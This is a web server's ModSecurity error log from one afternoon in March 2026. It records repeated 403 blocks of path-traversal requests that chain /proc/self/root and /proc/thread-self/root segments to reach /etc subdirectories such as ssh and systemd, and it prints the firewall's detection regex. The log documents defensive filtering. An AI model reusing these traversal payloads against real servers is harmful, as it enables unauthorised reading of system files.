[Mon Mar 16 14:37:56.803904 2026] [:error] [pid 15061:tid 140411641214720] [client 74.7.241.46:50968] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_9KTCbgAP5jq5Teg2JwAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:38:02.479692 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.241.46:58874] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_-qTCbgAP5jq5Teg2MAAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:38:04.916058 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.241.46:58876] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg__LysWC90G-1nBrBOMQAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:38:07.359787 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.241.46:58888] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg__6TCbgAP5jq5Teg2MwAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:38:08.701544 2026] [:error] [pid 15061:tid 140411540502272] [client 74.7.241.46:42724] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAAKTCbgAP5jq5Teg2NgAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:38:13.824854 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.241.46:42732] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhABJqj1wV0Si-Okef42QAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:38:30.030738 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.241.46:42746] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAFo6lpbStxTqkSkt2BgAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:38:35.031863 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.241.46:53230] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAG7ysWC90G-1nBrBOOQAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:38:36.903271 2026] [:error] [pid 14895:tid 140411699963648] [client 74.7.243.203:35818] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAHFajLEzk2WiQ-10cigAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:38:39.631587 2026] [:error] [pid 15568:tid 140411607643904] [client 74.7.241.46:53242] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAH6QpVkWug9HeOt8_-wAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:38:40.448604 2026] [:error] [pid 14895:tid 140411716749056] [client 74.7.243.203:38200] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAIFajLEzk2WiQ-10cjgAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:38:43.251761 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.241.46:53498] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAI46lpbStxTqkSkt2DwAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:38:50.811442 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.243.203:57666] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAKqQpVkWug9HeOt9ACwAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:38:52.251072 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.243.203:44438] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhALLysWC90G-1nBrBOQQAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:38:59.443194 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.243.203:44450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAM6TCbgAP5jq5Teg2TQAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:39:06.081265 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.243.203:33964] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAOo6lpbStxTqkSkt2HAAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:39:27.891303 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.244.31:52814] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhAT3jZBu2q05ozVU9kKAAAAUs"]
[Mon Mar 16 14:39:34.591787 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.241.46:53502] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAVqQpVkWug9HeOt9APwAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:39:36.974317 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.241.46:47608] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAWP9ocpUE4ed4uDz5oQAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:39:44.335474 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.241.46:34428] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAX6TCbgAP5jq5Teg2XQAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:39:50.527267 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:34430] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAZpqj1wV0Si-Okef5LgAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:40:50.447952 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:40160] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAov9ocpUE4ed4uDz54wAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
